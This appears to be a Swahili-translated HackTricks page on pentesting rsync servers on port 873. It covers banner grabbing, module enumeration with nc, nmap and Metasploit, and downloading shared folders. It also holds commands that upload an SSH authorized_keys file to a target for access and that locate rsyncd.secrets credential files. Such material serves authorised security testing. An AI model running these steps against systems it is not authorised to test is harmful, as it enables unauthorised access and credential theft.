873 - Pentesting Rsync

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud repos za github.

Maelezo Muhimu

rsync ni programu inayotumika kwa ufanisi katika kuhamisha na kusawazisha faili kati ya kompyuta na diski ngumu ya nje na kati ya kompyuta zilizounganishwa kwenye mtandao kwa kulinganisha nyakati za ubadilishaji na ukubwa wa faili.[3] Mara nyingi hupatikana kwenye mfumo wa uendeshaji kama vile Unix. Algorithm ya rsync ni aina ya delta encoding, na hutumiwa kupunguza matumizi ya mtandao. Zlib inaweza kutumika kwa kupunguza data ziada,[3] na SSH au stunnel inaweza kutumika kwa usalama.

Bandari ya chaguo-msingi: 873

PORT    STATE SERVICE REASON
873/tcp open  rsync   syn-ack

Uchambuzi

Bango na Mawasiliano ya Mwongozo

Kabla ya kuanza kuchunguza huduma ya rsync, ni muhimu kufanya uchambuzi wa awali ili kupata habari muhimu. Kuna njia mbili za kufanya hivyo: kuchunguza bango na kuwasiliana kwa mwongozo.

Kuchunguza Bango

Kuchunguza bango kunahusisha kupata habari kutoka kwa bango la huduma ya rsync. Unaweza kutumia amri ya telnet au zana kama nmap kufanya hivyo. Kwa mfano, unaweza kutumia amri ifuatayo:

telnet <IP> 873

Ikiwa unapata majibu kutoka kwa seva ya rsync, unaweza kusoma habari muhimu kama toleo la huduma na maelezo mengine yanayoweza kuwa na manufaa.

Kuwasiliana kwa Mwongozo

Kuwasiliana kwa mwongozo kunahusisha kujaribu kuunganisha na seva ya rsync kwa kutumia amri ya rsync na kuchunguza majibu yake. Unaweza kutumia amri ifuatayo:

rsync rsync://<IP>:873

Ikiwa unapata majibu kutoka kwa seva ya rsync, unaweza kusoma habari muhimu kama toleo la huduma na maelezo mengine yanayoweza kuwa na manufaa.

nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection


#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password

Kutambaza Folda Zilizoshirikiwa

Moduli za Rsync hutambuliwa kama kushiriki folda ambazo zinaweza kuwa zimekingwa na nywila. Ili kutambua moduli zilizopo na kuangalia kama zinahitaji nywila, tumia amri zifuatazo:

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730

Kuwa makini kwamba baadhi ya hisa huenda zisionekane kwenye orodha, huenda zikifichwa. Aidha, kupata baadhi ya hisa kunaweza kuwa na kikwazo cha vitambulisho maalum, kama inavyoonyeshwa na ujumbe wa "Access Denied".

Brute Force

Matumizi ya Rsync kwa Mikono

Baada ya kupata orodha ya moduli, hatua zinategemea kama uwakilishi unahitaji uwakilishaji. Bila uwakilishaji, kuorodhesha na kukopi faili kutoka kwenye folda iliyoshirikiwa kwenda kwenye saraka ya ndani inafanikiwa kupitia:

# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name

# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared

Mchakato huu unaendeleza faili kwa njia ya kurejesha, ukilinda sifa na ruhusa zake.

Kwa vitambulisho, orodha na kupakua kutoka kwenye folda iliyoshirikiwa inaweza kufanywa kama ifuatavyo, ambapo itaonekana ombi la nenosiri:

rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared

Kutuma maudhui, kama faili ya authorized_keys kwa ajili ya ufikiaji, tumia:

rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh

POST

Ili kupata faili ya usanidi ya rsyncd, tekeleza:

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)

Ndani ya faili hii, parameteri ya secrets file inaweza kuashiria faili inayohifadhi majina ya watumiaji na nywila kwa ajili ya uwakiki wa rsyncd.

Marejeo

https://www.smeegesec.com/2016/12/pentesting-rsync.html

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikionekana katika HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi wa PEASS & HackTricks
Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.

Previous700 - Pentesting EPP Next1026 - Pentesting Rusersd

Last updated 2 months ago